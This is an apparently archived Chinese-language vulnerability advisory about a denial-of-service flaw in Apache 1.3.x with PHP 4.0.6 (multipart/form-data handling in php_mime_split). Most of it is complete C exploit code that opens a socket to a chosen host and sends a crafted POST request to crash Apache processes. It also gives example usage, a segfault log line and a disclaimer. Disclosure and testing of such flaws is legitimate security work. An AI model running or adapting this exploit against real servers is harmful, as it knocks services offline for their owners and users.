Apache & PHP 拒绝服务漏洞测试代码
/ns/ld/unix/data/20020311143426.htm
涉及程序:
Apache & PHP
描述:
Apache & PHP 漏洞测试代码
详细:
下面是 Apache/1.3.x + php_4.0.6 漏洞的测试代码。该代码利用了 multipart/form-data POST 漏洞,但是只能导致 Apache 拒绝服务,而没在远程机器上执行任何代码或开出 shell。
PHP 支持 multipart/form-data POST 请求,称作 POST 文件上传。但是 php_mime_split 函数存在多个漏洞,远程攻击者利用这些漏洞可能在受影响系统上执行任意代码。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
Example:
$ ./apache_php host 80 hi.php
$ cat /www/logs/error_log
[Sun Mar 3 02:50:36 2002] [notice] child pid 26856 exit signal Segmentation fault (11)
$
Exploit code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>
#define MAX 1000
#define PORT 80
char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[MAX]="";
char *pt=strstr(string,orig);
strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}
int main(int argc,char *argv[MAX])
{
int sockfd;
int numbytes;
int port;
char *ptr;
char POST_REQUEST[MAX] =
"POST ##file HTTP/1.0\n"
"Referer: http://host/xxxxxx/exp.php?hi_lames=haha\n"
"Connection: Keep-Alive\nContent-type: multipart/for"
"m-data; boundary=---------------------------1354088"
"10612827886801697150081\nContent-Length: 567\n\n---"
"--------------------------1354088106128278868016971"
"50081\nContent-Disposition: form-data; name=\"\x8\"";
struct hostent *he;
struct sockaddr_in their_addr;
if(argc!=4)
{
fprintf(stderr,"usage:%s <hostname> <port> <php_file>\n",argv[0]);
exit(1);
}
port=atoi(argv[2]);
ptr=str_replace(argv[3],"##file",POST_REQUEST);
//ptr=POST_REQUEST;
if((he=gethostbyname(argv[1]))==NULL)
{
perror("gethostbyname");
exit(1);
}
if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror("socket"); exit(1);
}
their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(port);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
bzero(&(their_addr.sin_zero),8);
if( connect(sockfd,(struct sockaddr*)&their_addr,\
sizeof(struct sockaddr))==-1)
{
perror("connect");
exit(1);
}
if( send(sockfd,ptr,strlen(POST_REQUEST),0) ==-1)
{
perror("send");
exit(0);
}
close(sockfd);
return 0;
}
解决方案:
安装升级版本